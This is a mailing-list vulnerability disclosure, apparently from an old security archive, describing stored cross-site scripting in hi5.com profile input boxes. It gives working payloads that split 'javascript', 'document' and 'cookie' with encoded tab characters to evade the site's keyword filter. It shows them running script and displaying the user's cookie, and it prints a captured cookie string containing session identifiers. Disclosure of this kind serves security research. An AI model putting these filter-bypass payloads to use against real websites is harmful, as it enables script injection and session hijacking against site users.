<<< Date Index >>>     <<< Thread Index >>>

hi5.com - XSS with cookie disclosure



hi5.com

Homepage:
http://www.hi5.com

Affected files:

Input boxes of editing your profile.

XSS Vuln with cookie disclosure:

It seems hi5.com allows alot of html tags to be used on thier site but they 
will filter out words like javascript, applet, and iframe tags (which is to be 
expected). Heres a link to the page that lists allthe tags they will and won't 
allow:

http://hi5.com/friend/account/html_tips.html

How do we get around this? Well, to get around the javascript filtering we use 
An embedded encoded tab to break up the javascript word. Below are a few 
examples of it. For PoC try putting this in your profile. (I used the Hometown 
box, all should work tho) :

<IMG SRC="jav&#x09;ascript:alert('XSS');">

or

<DIV STYLE="background-image: url(jav&#x09;ascript:al&#x09;ert('XSS'))">

Why do we have to use an embedded encoded tab in the word "alert" in a div tag 
and not a img tag? I have no idea! 

Screenshots:
http://www.youfucktard.com/xsp/hi52.jpg
http://www.youfucktard.com/xsp/hi53.jpg

WHERES THE COOKIE?!?!

Now lets change that so we can show our cookie data. Since they don't seem to 
allow thewords document and cookie, 

lets use the same method above to break it up. Try putting:

Popup alert:
<IMG SRC="jav&#x09;ascript:alert(docu&#x09;ment.coo&#x09;kie);">

Write on screen:
<IMG SRC="jav&#x09;ascript:docu&#x09;ment.write(docu&#x09;ment.cookie);">

Our Cookie:
hi5banner_traffic_US; hi5medium_traffic_US; hi5sky_traffic_US; hi5uniqueAd2=1; 
hi5adcomRect; hi5adcomSky; 
hi5inpath=-1;hi5sp=homepage;hi5loggedIn=true;adHistoryLdr=4:1150268890485:4:1150268897936:1:1150269052890:1:1150269092966:8:1150269130139:9:1150269256989:9:1150269310562:10:1150269315812:11:1150269416327:11:1150269438591:12:1150269446349:13:1150269502289:13:1150269518708:14:1150269567146:15:1150269654968;
 sc=Fics:0:Ficb:0:Ficl:0; JSESSIONID=a229uu7JgBN7; 
K-JSESSIONID0x9882f778=6821EBA8AA2FB03B1F4D6B04A2799FED;adHistoryRct=1001:1150268898713:1001:1150269130834:1004:1150269316178:1004:1150269447018:1002:1150269519194:1002:1150269669974:1008:1150269721357:1007:1150269799646:1007:1150269971317:1010:1150270159468:1011:1150270778028:1011:1150270823873:1012:1150270950243;adHistorySky=2004:1150269046423:2004:1150269086714:2001:1150269250710:2001:1150269303450:2008:1150269409727:2007:1150269432295:2007:1150269495667:2020:1150269560927:2002:1150269648476:2002:1150269691452:2012:115
 
0269709420:2011:1150269751737:2011:1150269785251:2014:1150270053753:2015:1150270141733



Screenshots:
http://www.youfucktard.com/xsp/hi54.jpg
http://www.youfucktard.com/xsp/hi55.jpg